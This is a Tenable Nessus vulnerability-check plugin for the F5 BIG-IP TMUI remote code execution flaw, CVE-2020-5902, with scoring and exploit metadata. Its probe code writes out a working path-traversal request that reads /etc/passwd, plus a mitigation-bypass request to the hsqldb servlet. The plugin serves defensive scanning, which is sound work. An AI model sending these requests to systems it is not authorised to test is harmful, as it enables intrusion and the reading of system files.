nessus: F5_CVE-2020-5902.NASL — This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.
History: Jul 06, 2020 - 12:00 a.m.

F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)

2020-07-06 00:00:00
This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
612

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.975

Percentile

100.0%

A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.

#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  # Plugin identity and revision bookkeeping.
  script_id(138140);
  script_version("1.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/01/18");

  # Vulnerability references: the CVE plus the advisory and
  # known-exploitation trackers that cite it.
  script_cve_id("CVE-2020-5902");
  script_xref(name:"IAVA", value:"2020-A-0283-S");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
  script_xref(name:"CISA-NCAS", value:"AA22-011A");
  script_xref(name:"CEA-ID", value:"CEA-2020-0129");
  script_xref(name:"CEA-ID", value:"CEA-2020-0122");
  script_xref(name:"CEA-ID", value:"CEA-2020-0055");

  script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");

  # Report text. The description also states that the check covers the
  # bypass of the vendor's initial mitigation, which the probe logic
  # below implements as a second request.
  script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
  script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.

Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
  script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
  # Scoring. NOTE(review): the base vector is recorded under the CVSS:3.0
  # prefix; the CVE's published vector uses the CVSS:3.1 prefix with the
  # same metric values.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");

  # Exploitation-status flags surfaced in the report (public exploit code,
  # framework coverage, in-the-wild malware use).
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"F5 BIG-IP Traffic Management User Interface File Disclosure");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  # Disclosure / patch / plugin timeline.
  script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");

  # Target coverage: one cpe attribute per BIG-IP module that ships TMUI.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  # ACT_ATTACK: this is a direct check that sends probe requests to the
  # target (see the request logic below), not a version comparison.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Runs only after the BIG-IP web-management detection plugin has recorded
  # an install; 80/443 are the default www ports to try.
  script_dependencies("bigip_web_detect.nasl");
  script_require_keys("installed_sw/F5 BIG-IP web management");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include('http.inc');
include('install_func.inc');

# Locate the BIG-IP web-management install we are testing; both helpers
# exit the plugin on their own when nothing is found on the port.
app = 'F5 BIG-IP web management';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
install = get_single_install(app_name:app, port:port);
url = build_url(qs:"/", port:port);

# Two probes: the original unauthenticated file read through fileRead.jsp,
# and the hsqldb servlet path that defeats the vendor's first mitigation.
# A root entry in /etc/passwd is the evidence for the first probe.
passwd_pattern = "root:.*:0:[01]:";
poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
bypass_path = '/hsqldb;';

# Report parameters. These defaults describe the file-read outcome; the
# bypass branch below overrides them because it has no file to attach.
file = "/etc/passwd";
generic = FALSE;
line_limit = 10;

res = http_send_recv3(method:'GET', port:port, item:poc_path, exit_on_fail:TRUE);

if (egrep(pattern:passwd_pattern, string:res[2]))
{
  # fileRead.jsp returns the file with literal "\n" sequences; turn them
  # back into real line breaks for the report attachment.
  output = str_replace(string:res[2], find:'\\n', replace:'\n');
}
else
{
  res = http_send_recv3(method:'GET', port:port, item:bypass_path, exit_on_fail:TRUE);

  # Neither probe succeeded: the host is not affected.
  if ('HSQL Database Engine Servlet' >!< res[2])
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

  # The servlet answered without authentication, which is the mitigation
  # bypass. Attach a short generic excerpt of the response instead.
  output = chomp(res[2]);
  file = NULL;
  generic = TRUE;
  line_limit = 3;
}

# Only the last request sent is included as evidence, which is the one
# that produced the matching response in either branch.
security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  request     : make_list(http_last_sent_request()),
  file        : file,
  generic     : generic,
  output      : output,
  line_limit  : line_limit,
  attach_type : 'text/plain'
);
